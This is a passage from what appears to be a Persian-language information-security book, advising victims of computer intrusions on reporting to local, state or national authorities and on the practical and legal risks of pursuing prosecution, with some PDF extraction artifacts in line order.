‫ﻣﻮﺭﺩ ﻛﻪ ﺩﺭ ﺁﻥ ﻳﻜﻨﻔﺮ ﻣﻜﺮﺭﹰﺍ ﺍﺯ ﻃﺮﻳﻖ ﻣـﻮﺩﻡ‪ ،‬ﺭﺍﻳﺎﻧـﺔ ﺷﺨـﺼﻲ‬
‫ﺷﻤﺎ ﺭﺍ ﭘﻮﻳﺶ ﻣﻲﻛﻨﺪ ﺑﺴﻴﺎﺭ ﺑﻴﺸﺘﺮ ﺍﺳﺖ‪.‬‬
‫ﺍﻃﻼﻋﺎﺕ ﺭﺍﺟﻊ ﺑﻪ ﺗﺤﻘﻴﻘﺎﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺷﻤﺎ ﺩﺍﺩﻩ ﺑﺸﻮﺩ ﻳـﺎ‬
‫ﻧــﺸﻮﺩ‪ .‬ﺣﺘــﻲ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺩﺭ ﺟﺮﻳــﺎﻥ ﺗﺤﻘﻴﻘــﺎﺕ ﺍﻃﻼﻋــﺎﺕ‬
‫ﻼ ﺩﺭﺣﺎﻟﻴﻜﻪ ﺑﺎﺯﺭﺳـﺎﻥ ﺷـﺪﻳﺪﹰﺍ‬
‫ﻧﺎﺩﺭﺳﺖ ﺑﻪ ﺷﻤﺎ ﺍﺭﺍﺋﻪ ﮔﺮﺩﺩ ‪ -‬ﻣﺜ ﹰ‬
‫ﻣﺸﻐﻮﻝ ﻛﺎﺭ ﻫﺴﺘﻨﺪ ﺑﻪ ﺷﻤﺎ ﮔﻔﺘﻪ ﺷﻮﺩ ﻫﻴﭽﮕﻮﻧﻪ ﺗﺤﻘﻴﻘـﺎﺗﻲ ﺩﺭ‬
‫ﻛﺎﺭ ﻧﻴﺴﺖ‪.‬‬
‫ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ‪ ،‬ﺷﻤﺎ ﺭﺍ ﺩﺭ ﻣـﻮﻗﻌﻴﺘﻲ‬
‫ﻧﺎﭘﺎﻳﺪﺍﺭ ﻗﺮﺍﺭ ﺩﻫﺪ‪ .‬ﺍﮔﺮ ﺍﻓﺮﺍﺩ ﻧﺎﺷﻨﺎﺱ ﺑﻪ ﻧﻔﻮﺫ ﺧـﻮﺩ ﺑـﻪ ﺳﻴـﺴﺘﻢ‬
‫ﺷﻤﺎ ﺍﺩﺍﻣﻪ ﺩﻫﻨﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺮﺍﺟﻊ ﻗﺎﻧﻮﻧﻲ ﺍﺯ ﺷـﻤﺎ ﺑﺨﻮﺍﻫﻨـﺪ‬
‫ﻛﻪ ﺳﻴﺴﺘﻢ ﺧﻮﺩ ﺭﺍ ﺑﺎﺯ ﺑﮕﺬﺍﺭﻳﺪ ﺗﺎ ﺑﺎﺯﺭﺳﺎﻥ ﺍﺗﺼﺎﻻﺕ ﺳﻴـﺴﺘﻢ ﺭﺍ‬
‫ﺭﺩﻳﺎﺑﻲ ﻛﻨﻨﺪ ﻭ ﺑﺮﺍﻱ ﺩﺳﺘﮕﻴﺮﻱ ﻣﺘﻬﻢ ﺑـﻪ ﺟﻤـﻊﺁﻭﺭﻱ ﻣـﺪﺍﺭﻙ‬
‫ﺑﭙﺮﺩﺍﺯﻧــﺪ‪ .‬ﻣﺘﺄﺳــﻔﺎﻧﻪ ﺑﺎﺯﮔﺬﺍﺷــﺘﻦ ﺩﺭﻫــﺎﻱ ﺳﻴــﺴﺘﻢ ﺑﻌــﺪ ﺍﺯ‬
‫ﻣﺸﺨﺺﺷﺪﻥ ﺍﻳﻨﻜﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻣﻮﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺩﺍﺭﺩ‪،‬‬
‫ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺍﺯ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﺟﻬﺖ ﺍﻧﺠـﺎﻡ ﺧﺮﺍﺑﻜـﺎﺭﻱ‬
‫ﺭﻭﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﻳﮕﺮ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﻳـﻚ ﺩﺍﺩﻧﺎﻣـﺔ‬
‫ﺛﺎﻟﺚ ﺷﻤﺎ ﺭﺍ ﺩﺭ ﻣﻈﺎﻥ ﺍﺗﻬﺎﻡ ﻗـﺮﺍﺭ ﺩﻫـﺪ‪ ،‬ﭼﺮﺍﻛـﻪ ﻫﻤﻜـﺎﺭﻱ ﺑـﺎ‬
‫ﻧﻬﺎﺩﻫﺎﻱ ﻗﺎﻧﻮﻧﻲ ﻣﺎﻧﻊ ﺍﺯ ﻭﺍﺭﺩ ﺷﺪﻥ ﺍﺗﻬﺎﻡ ﺑﻪ ﺷﻤﺎ ﻧﻴـﺴﺖ‪ .‬ﭘـﺲ‬
‫ﺑﻬﺘﺮ ﺍﺳﺖ ﻗﺒﻞ ﺍﺯ ﭘـﺬﻳﺮﺵ ﭼﻨـﻴﻦ ﻣﺨـﺎﻃﺮﺍﺗﻲ ﺟﻮﺍﻧـﺐ ﺍﻣـﺮ ﺭﺍ‬
‫ﻼ ﺑﺮﺭﺳﻲ ﻛﻨﻴﺪ‪.‬‬
‫ﻛﺎﻣ ﹰ‬
‫ﺗﻤﺎﺱ ﺑﺎ ﻣﺮﺍﺟﻊ ﻣﺮﺑﻮﻃﻪ‬
‫ﺩﺭ ﺯﻣﻴﻨﺔ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺴﺘﻪ ﺑﻪ ﺍﻳﻨﻜﻪ ﭼﻪ ﻧﻮﻉ ﺳﻴﺴﺘﻢ ﻗﺎﻧﻮﻧﻲ‬
‫ﻭ ﺟﺰﺍﺋﻲ ﺩﺭ ﻛﺸﻮﺭ ﺷﻤﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﻻﺯﻡ ﺑﺎﺷﺪ ﻛـﻪ‬
‫ﺍﻗﺪﺍﻣﺎﺕ ﺧﺎﺻﻲ ﺭﺍ ﺟﻬﺖ ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ ﺑﺎ ﻣﺴﺌﻮﻟﻴﻦ ﻣﺤﻠﻲ ﻳـﺎ‬
‫ﻼ ﺑﻌﻀﻲ ﺗﻮﺻﻴﻪﻫﺎﻱ ﻛﻠﻲ ﺁﻭﺭﺩﻩ ﺷـﺪﻩ‬
‫ﻛﺸﻮﺭﻱ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ‪ .‬ﺫﻳ ﹰ‬
‫ﺍﻣﺎ ﻃﺒﻴﻌﺘﹰﺎ ﺍﮔﺮ ﺁﻧﻬﺎ ﺭﺍ ﻃﺒﻖ ﺭﻭﺷـﻬﺎﻱ ﻣﻨﺎﺳـﺐ ﻛـﺸﻮﺭ ﺧﻮﺩﺗـﺎﻥ‬
‫ﺑﻜﺎﺭ ﺑﺒﺮﻳﺪ ﺗﺄﺛﻴﺮ ﺑﻴﺸﺘﺮﻱ ﺧﻮﺍﻫﻨﺪ ﺩﺍﺷﺖ‪.‬‬
‫•‬
‫‪ ۱۳۱‬ﺍﻟﺒﺘﻪ ﺗﻌﺪﺍﺩ ﺑﺴﻴﺎﺭ ﻛﻤﻲ ﺍﺯ ﻧﻔﻮﺫﮔﺮﺍﻥ ﻭﺍﻗﻌﹰﺎ ﺑﻪ ﺍﻧﺪﺍﺯﻩﺍﻱ ﺑﺎﻫﻮﺵ ﻫـﺴﺘﻨﺪ‬
‫ﻛﻪ ﺧﻮﺩﺷﺎﻥ ﻓﻜﺮ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﺍﮔﺮ ﺍﻣﻜﺎﻥ ﺁﻥ ﻭﺟﻮﺩ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ ﺑﻬﺘـﺮ ﺍﺳـﺖ ﺍﻭﻝ ﺑـﻪ‬
‫ﻣﺮﺍﺟﻊ ﻣﺤﻠﻲ ﻳﺎ ﺍﺳﺘﺎﻧﻲ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ‪ .‬ﺍﮔﺮ ﻣﺮﺍﺟﻊ ﺍﺳﺘﺎﻧﻲ‬
‫ﺗﺸﺨﻴﺺ ﺩﻫﻨﺪ ﻛﻪ ﻣﺴﺌﻠﻪ ﺗﻮﺳﻂ ﻋﻮﺍﻣﻞ ﻛﺸﻮﺭﻱ ﺑﻬﺘـﺮ‬
‫‪١٨١‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﻣﻮﺭﺩ ﺗﺤﻘﻴـﻖ ﻗـﺮﺍﺭ ﮔﻴـﺮﺩ ﺑـﻪ ﺷـﻤﺎ ﭘﻴـﺸﻨﻬﺎﺩ‬
‫ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﻣﺮﺍﺟﻌـﻪ ﻧﻤﺎﻳﻴـﺪ‪ .‬ﻫﺮﭼﻨـﺪ ﻣﺘﺄﺳـﻔﺎﻧﻪ‬
‫ﻲ ﺍﺟـﺮﺍﻱ ﻗـﻮﺍﻧﻴﻦ ﻋﻼﻗـﻪﺍﻱ ﺑـﻪ‬
‫ﺑﺮﺧﻲ ﺍﺯ ﺩﻭﺍﻳـﺮ ﻣﺤﻠـ ﹺ‬
‫ﻲ ﻣﺄﻣﻮﺭﺍﻥ ﻛﺸﻮﺭﻱ ﻧﺪﺍﺭﻧﺪ‪ .‬ﺍﻳـﻦ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﻴﺮﻭﻱ ﻛﻤﻜ ﹺ‬
‫ﺍﻣﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﺳﺒﺐ ﺷﻮﺩ ﺭﺧـﺪﺍﺩ ﺍﻣﻨﻴﺘـﻲ ﻣﺮﺑـﻮﻁ ﺑـﻪ‬
‫ﺷﻤﺎ ﺑﺪﺭﺳﺘﻲ ﺗﺤﺖ ﺗﺤﻘﻴﻘﺎﺕ ﻗﺮﺍﺭ ﻧﮕﻴﺮﺩ‪.‬‬
‫•‬
‫ﻫﺮﭼﻨﺪ ﺑﺮﺧﻲ ﺍﺯ ﻣﺴﺌﻮﻻﻥ ﻣﺤﻠﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺭ ﺯﻣﻴﻨﺔ‬
‫ﺭﺍﻳﺎﻧﻪ ﻭ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﻣﻬﺎﺭﺕ ﺯﻳﺎﺩﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ‪ ،‬ﺍﻣﺎ‬
‫ﺣﺘﻲ ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻫﻢ ﻋﻤﻮﻣﹰﺎ ﻣـﺴﺌﻮﻻﻥ ﻣﺤﻠـﻲ ﺍﺯ‬
‫ﻣﺴﺌﻮﻻﻥ ﺍﻳـﺎﻟﺘﻲ ﻭ ﻛـﺸﻮﺭﻱ ﺗﺠﺮﺑـﺔ ﻛﻤﺘـﺮﻱ ﺩﺍﺭﻧـﺪ ﻭ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ ﭘﻴﺸﺮﻓﺘﻪ ﺑﺮﺍﻳـﺸﺎﻥ ﺳـﺨﺖ‬
‫ﺑﺎﺷــﺪ‪ .‬ﺩﺭ ﻋــﻮﺽ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﺳــﺎﺯﻣﺎﻧﻬﺎﻱ ﻛــﺸﻮﺭﻱ ﺍﺯ‬
‫ﻛﺎﺭﺷﻨﺎﺳﺎﻧﻲ ﺑﻬﺮﻩﻣﻨﺪﻧﺪ ﻛﻪ ﻣﻲﺗﻮﺍﻥ ﺁﻧﻬﺎ ﺭﺍ ﺑـﻪ ﺳـﺮﻋﺖ‬
‫ﻭﺍﺭﺩ ﺟﺮﻳﺎﻥ ﺣﻞ ﻣﺸﻜﻼﺕ ﻛﺮﺩ‪.‬‬
‫•‬
‫ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻣﻘﺎﻣـﺎﺕ ﺍﻳـﺎﻟﺘﻲ ﻧـﺴﺒﺖ ﺑـﻪ ﻣﻘﺎﻣـﺎﺕ‬
‫ﻛﺸﻮﺭﻱ ﻋﻼﻗﺔ ﺑﻴـﺸﺘﺮﻱ ﺑـﻪ ﺗﻌﻘﻴـﺐ ﻭ ﻛـﺸﻒ ﺟـﺮﺍﺋﻢ‬
‫ﺟﻮﺍﻧﺎﻥ ﻭ ﻧﻮﺟﻮﺍﻧﺎﻥ ﻧﺸﺎﻥ ﻣﻲﺩﻫﻨﺪ‪ .‬ﺍﮔﺮ ﻣﻲﺩﺍﻧﻴـﺪ ﻛـﻪ ﺍﺯ‬
‫ﺟﺎﻧﺐ ﻳﻚ ﻧﻮﺟﻮﺍﻥ ﻛﻪ ﺩﺭ ﺍﻳﺎﻟـﺖ ﺧﻮﺩﺗـﺎﻥ ﺍﻗﺎﻣـﺖ ﺩﺍﺭﺩ‬
‫ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪﺍﻳﺪ ﺑﻬﺘﺮ ﺍﺳﺖ ﺑﻪ ﻣﻘﺎﻣﺎﺕ ﻣﺤﻠـﻲ‬
‫ﺭﺟﻮﻉ ﻧﻤﺎﻳﻴﺪ‪ .‬ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻫﻢ ﺑﻬﺘﺮ ﺍﺳﺖ ﻛﻪ ﺭﺍﻫﻬـﺎﻱ‬
‫ﭘﻴﮕﺮﺩ ﻗﺎﻧﻮﻧﻲ ﺭﺍ ﻛﻨﺎﺭ ﺑﮕﺬﺍﺭﻳﺪ ﻭ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺑـﺎ ﻭﺍﻟـﺪﻳﻦ ﻳـﺎ‬
‫ﻣﻌﻠﻤــﻴﻦ ﺁﻥ ﻣﻬــﺎﺟﻢ ﺟــﻮﺍﻥ ﺻــﺤﺒﺖ ﻛﻨﻴــﺪ )ﻳــﺎ ﺍﺯ ﻳــﻚ‬
‫ﺣﻘﻮﻗﺪﺍﻥ ﻳﺎ ﭘﻠﻴﺲ ﺑﺨﻮﺍﻫﻴﺪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺑﺮﺍﻱ ﺷﻤﺎ ﺍﻧﺠﺎﻡ ﺩﻫﺪ(‪.‬‬
‫ﻣﺨﺎﻃﺮﺍﺕ ﭘﻴﮕﺮﺩ ﻣﺘﻬﻤﺎﻥ‬
‫ﺩﺭ ﺍﺳﺘﻤﺪﺍﺩ ﺍﺯ ﻣﺮﺍﺟﻊ ﻗﺎﻧﻮﻧﻲ ﻣﺸﻜﻼﺕ ﺑﺎﻟﻘﻮﺓ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‬
‫ﻛﻪ ﻣﺤﺪﻭﺩ ﺑﻪ ﻣﺴﺎﺋﻠﻲ ﭼﻮﻥ ﺗﺠﺮﺑﺔ ﻛﺎ ﹺﺭ ﺁﻧﻬﺎ ﺑﺎ ﺭﺍﻳﺎﻧﻪ ﻭ ﺷﺒﻜﻪ ﻭ‬
‫ﻳﺎ ﺗﻌﻘﻴﺐ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﻧﻤﻲﺷﻮﺩ‪ .‬ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻣﻤﻜﻦ ﺍﺳـﺖ‬
‫ﻣﺮﺍﺟﻌﻲ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﻭ ﺗﺠﺮﺑﺔ ﻛﺎﻓﻲ ﺩﺭ ﺯﻣﻴﻨـﺔ ﺭﺍﻳﺎﻧـﻪ ﻧﺪﺍﺭﻧـﺪ‬
‫ﺑﻤﻨﻈﻮﺭ ﺩﺭﻙ ﻧﻜﺎﺕ ﭘﺮﻭﻧﺪﻩ‪ ،‬ﺷﻤﺎ ﺭﺍ ﺩﻋﻮﺕ ﺑﻪ ﻫﻤﻜﺎﺭﻱ ﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺍﮔﺮ ﺍﺯ ﺷﻤﺎ ﻭ ﻛﺎﺭﻣﻨﺪﺍﻧﺘﺎﻥ ﺧﻮﺍﺳﺘﻪ ﺷﺪ ﻛـﻪ ﺩﺭ ﻓﺮﺁﻳﻨـﺪ ﺗﺤﻘﻴـﻖ‬
‫ﺑﺮﺍﻱ ﻛﻤﻚ ﺑﻪ ﺷﻨﺎﺧﺖ ﻣﻮﺿـﻮﻉ ﻣـﺸﺎﺭﻛﺖ ﻧﻤﺎﺋﻴـﺪ‪ ،‬ﺍﻃﻤﻴﻨـﺎﻥ‬
‫ﻳﺎﺑﻴﺪ ﻛﻪ ﺍﻳﻦ ﻋﻤﻞ ﺑﻪ ﺩﺳﺘﻮﺭ ﺩﺍﺩﮔﺎﻩ ﺍﻧﺠﺎﻡ ﺷﺪﻩ ﺍﺳـﺖ؛ ﭼﺮﺍﻛـﻪ‬
‫ﺩﺭ ﻏﻴﺮﺍﻳﻨــﺼﻮﺭﺕ ﻣﻤﻜــﻦ ﺍﺳــﺖ ﺑﻨﻈــﺮ ﺑﻴﺎﻳــﺪ ﻛــﻪ ﻣــﺸﺘﺎﻕ‬
‫ﻗﺮﺑﺎﻧﻲﺷﺪﻥ ﺑﻮﺩﻩﺍﻳﺪ‪ .‬ﺑﻬﺘﺮ ﺍﺳﺖ ﻛـﻪ ﻳـﻚ ﺷـﺨﺺ ﺑﻴﻄـﺮﻑ ﺭﺍ‬
‫ﺑﺮﺍﻱ ﻫﻤﻜﺎﺭﻱ ﺑﺎ ﻧﻤﺎﻳﻨﺪﮔﺎﻥ ﻧﻴﺮﻭﻫﺎﻱ ﺍﻧﺘﻈﺎﻣﻲ ﻭ ﺩﻭﺍﻳﺮ ﺍﺟـﺮﺍﻱ‬
‫ﻗﺎﻧﻮﻥ ﻣﻌﺮﻓﻲ ﻛﻨﻴﺪ‪.‬‬
‫ﻣﻨﺶ ﻭ ﺭﻓﺘﺎﺭ ﻣﺠﺮﻳﺎﻥ ﻗﺎﻧﻮﻥ ﮔﻬﮕﺎﻩ ﻣـﺸﻜﻼﺕ ﺟـﺪﻱ ﺑﻮﺟـﻮﺩ‬
‫ﻣﻲﺁﻭﺭﺩ‪ .‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺧﻲ ﺗﺠﻬﻴﺰﺍﺕ ﺷﻤﺎ ﺑﻪ ﺑﻬﺎﻧـﺔ ﺑـﺎﺯﺟﻮﻳﻲ‬
‫ﻳﺎ ﻛﻨﺘﺮﻝ ﺑﺮﺍﻱ ﻣﺪﺗﻬﺎﻱ ﻏﻴﺮﻗﺎﺑﻞ ﺗﻮﺟﻴﻬﻲ ﺗﻮﻗﻴﻒ ﺷﻮﻧﺪ ‪ -‬ﺣﺘﻲ‬
‫ﺍﮔﺮ ﺧﻮﺩ‪ ،‬ﻗﺮﺑﺎﻧﻲ ﻳﻚ ﺟﺮﻡ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺎﺷـﻴﺪ‪ .‬ﺍﮔـﺮ ﺷـﻤﺎ ﻗﺮﺑـﺎﻧﻲ‬
‫ﻻ‬
‫ﺑﻮﺩﻩﺍﻳﺪ ﻭ ﺭﺧﺪﺍﺩ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺧﻮﺩﺗﺎﻥ ﮔﺰﺍﺭﺵ ﻛـﺮﺩﻩﺍﻳـﺪ‪ ،‬ﻣﻌﻤـﻮ ﹰ‬
‫ﻣﻘﺎﻣﺎﺕ ﺷﻤﺎ ﺭﺍ ﺍﺯ ﺗﻼﺷﻬﺎﻳﺸﺎﻥ ﻣﻄﻠﻊ ﻣﻲﻛﻨﻨﺪ ﺗﺎ ﻧﺎﺭﺿﺎﻳﺘﻲ ﺷﻤﺎ‬
‫ﺭﺍ ﺑﻪ ﺣﺪﺍﻗﻞ ﺑﺮﺳﺎﻧﻨﺪ‪ .‬ﺑﺎ ﺍﻳﻨﺤـﺎﻝ ﺍﮔـﺮ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﺍﺯ ﻛﺎﺭﻣﻨـﺪﺍﻥ‬
‫ﺧﻮﺩﺗﺎﻥ ﺑﺎﺷﻨﺪ ﻭ ﻳﺎ ﭘﺎﻱ ﻣﺴﺎﺋﻞ ﺣﺴﺎﺳﻲ ﭼﻮﻥ ﺍﻃﻼﻋﺎﺕ ﺭﺳﻤﻲ‬
‫ﻭ ﻧﻈﺎﻣﻲ ﺩﺭ ﻣﻴﺎﻥ ﺑﺎﺷﺪ‪ ،‬ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﻤﺎ ﻧﻈـﺎﺭﺗﻲ ﺭﻭﻱ ﺭﻭﺵ‬
‫ﻭ ﻣﺪﺗﻲ ﻛﻪ ﺳﻴـﺴﺘﻤﻬﺎ ﻭ ﺭﺳـﺎﻧﻪﻫـﺎﻱ ﺫﺧﻴـﺮﻩﺳـﺎﺯﻳﺘﺎﻥ ﺗﺤـﺖ‬
‫ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪ .‬ﺍﻳﻦ ﻣﺸﻜﻞ ﺯﻣﺎﻧﻲ ﺣـﺎﺩﺗﺮ‬
‫ﻣﻲ ﺷﻮﺩ ﻛﻪ ﺑﺎﺯﺭﺳﺎﻥ ﭘﺮﻭﻧـﺪﻩ ﻧﻴﺎﺯﻣﻨـﺪ ﻫﻤﻜـﺎﺭﻱ ﻣﺘﺨﺼـﺼﺎﻧﻲ‬
‫ﺧﺎﺭﺝ ﺍﺯ ﺩﻓﺎﺗﺮ ﻣﺤﻠﻲ ﺧﻮﺩ ﻧﻴﺰ ﺑﺎﺷﻨﺪ‪ .‬ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛـﻪ‬
‫ﺯﻣﺎﻥ ﺍﻳﺠﺎﺩ ﻭﻗﻔﻪ ﺩﺭ ﻛﺎﺭ ﺑﺪﻟﻴﻞ ﺷﺮﺍﻳﻂ ﺍﺟﺒﺎﺭﻱ ﺍﻧﺠﺎﻡ ﺗﺤﻘﻴﻘﺎﺕ‬
‫ﺭﺍ ﻣﺤﺎﺳﺒﻪ ﻣﻲﻧﻤﺎﻳﻴﺪ؛ ﭼﺮﺍﻛﻪ ﺍﻳﻦ ﺯﻣﺎﻥ ﻭ ﺧﺴﺎﺭﺗﻬﺎﻱ ﻧﺎﺷـﻲ ﺍﺯ‬
‫ﺁﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻌﻨﻮﺍﻥ ﻗﺴﻤﺘﻲ ﺍﺯ ﺁﺳـﻴﺒﻬﺎﻱ ﻭﺍﺭﺩﺓ ﻫﻨﮕـﺎﻡ ﭘﻴﮕـﺮﺩ‬
‫ﻗﺮﺍﺭ ﮔﻴﺮﺩ ﻭ ﻣﺘﻌﺎﻗﺒﹰﺎ ﺩﺭ ﻫﺮ ﺩﺍﺩﺧﻮﺍﺳﺖ ﻣـﺪﻧﻲ )ﺩﺍﺩﺧﻮﺍﺳـﺘﻬﺎﻳﻲ ﻛـﻪ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﻋﻠﻴﻪ ﻣﻬﺎﺟﻢ ﻭ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻧﻴﺰ ﻋﻠﻴﻪ ﺧـﻮﺩ ﺩﻭﺍﻳـﺮ ﺍﺟـﺮﺍﻱ ﻗـﻮﺍﻧﻴﻦ‬
‫ﺗﻨﻈﻴﻢ ﺷﻮﺩ( ﺑﻜﺎﺭ ﺭﻭﺩ‪.‬‬
‫ﺩﺭ ﺟﺮﻳﺎﻥ ﺗﺤﻘﻴﻘﺎﺕ ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ ﺍﺯ ﻣﻨـﺎﺑﻊ ﺑـﺴﻴﺎﺭ ﺑـﺎ‬
‫ﺍﺭﺯﺵ ﺑﻪ ﺷـﻤﺎﺭ ﻣـﻲﺭﻭﻧـﺪ‪ .‬ﻋـﻼﻭﻩ ﺑـﺮ ﺍﻳـﻦ‪ ،‬ﺩﺭﺻـﻮﺭﺕ ﻟـﺰﻭﻡ‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫•‬
‫ﻣﺮﺍﺟﻊ ﻣﺤﻠﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑـﻪ ﭘﻴﮕﻴـﺮﻱ ﺷـﻜﺎﻳﺖ ﺷـﻤﺎ‬
‫ﻋﻼﻗﺔ ﺑﻴﺸﺘﺮﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻨﺪ؛ ﭼـﻮﻥ ﺑـﻪ ﺍﺣﺘﻤـﺎﻝ ﺯﻳـﺎﺩ‬
‫ﻣﺸﻜﻠﻲ ﻛﻪ ﺑﺮﺍﻱ ﺷﻤﺎ ﭘﻴﺶ ﺁﻣﺪﻩ ﺩﺭ ﻛﻨﺎﺭ ﻫﺰﺍﺭﺍﻥ ﻣـﻮﺭﺩ‬
‫ﻣﺸﺎﺑﻪ ﺩﻳﮕﺮ )ﺑﻪ ﺁﻥ ﺍﻧﺪﺍﺯﻩ ﻛـﻪ ﺩﺭ ﺳـﻄﺢ ﻛـﺸﻮﺭﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ(‬
‫ﻗﺮﺍﺭ ﻧـﺪﺍﺭﺩ‪ .‬ﺑﻨـﺎﺑﺮﺍﻳﻦ ﺍﺣﺘﻤـﺎﻝ ﺑﻴـﺸﺘﺮﻱ ﻭﺟـﻮﺩ ﺧﻮﺍﻫـﺪ‬
‫ﺩﺍﺷﺖ ﻛﻪ ﻣﺴﺌﻮﻻﻥ ﻣﺤﻠـﻲ ﺑـﻪ ﻣـﺸﻜﻞ ﺷـﻤﺎ ﺍﻫﻤﻴـﺖ‬
‫ﺩﻫﻨﺪ؛ ﺣﺘﻲ ﺍﮔﺮ ﺁﻥ ﻣﺸﻜﻞ ﺧﻴﻠﻲ ﻛﻮﭼﻚ ﺑﺎﺷﺪ‪.‬‬
‫ﺩﺭ ﺣﺎﻻﺕ ﺩﻳﮕﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ ﺻـﺮﻓﻨﻈﺮ ﻛﻨﻨـﺪ‬
‫ﺗﺎ ﻓﻘﺪﺍﻥ ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﺭﺍ ﺑﭙﻮﺷﺎﻧﻨﺪ ﻭ ﺍﺯ ﺯﻳﺮ ﺳﺆﺍﻝ ﺭﻓﺘﻦ ﺍﻋﺘﺒﺎﺭ‬
‫ﺩﻭﺍﻳﺮ ﺍﺟﺮﺍﻱ ﻗﻮﺍﻧﻴﻦ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤﺎﻳﻨﺪ‪ .‬ﻻﺯﻡ ﺑﻪ ﺫﻛﺮ ﺍﺳﺖ ﻛﻪ ﺩﺭ‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﺍﻳﻦ ﺍﺣﺘﻤﺎﻝ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺧﻮﺩ ﻗﺮﺑﺎﻧﻲ ﻫﻢ ﺩﺭ‬
‫ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺟﻨﺎﻳﻲ ﻧﻘﺶ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ .‬ﻳـﻚ ﺑـﺎﺯﺭﺱ ﺑﺎﺗﺠﺮﺑـﻪ ﺩﺭ‬
‫ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ‪ ،‬ﺑﻪ ﻧﻈﺮﺍﺕ ﻗﺮﺑﺎﻧﻲ ﺍﻃﻤﻴﻨﺎﻥ ﻛﺎﻣﻞ ﻭ ﺑـﻲ ﺷـﻚ ﻭ‬
‫ﺷﺒﻬﻪ ﻧﻤﻲﻧﻤﺎﻳﺪ؛ ﻭ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺮﺍﻱ ﺟﺮﺍﺋﻢ ﺩﻧﻴـﺎﻱ ﺳـﺎﻳﺒﺮ ﻫـﻢ‬
‫ﺻﺪﻕ ﻣﻲﻛﻨﺪ‪.‬‬
‫‪١٨٢‬‬
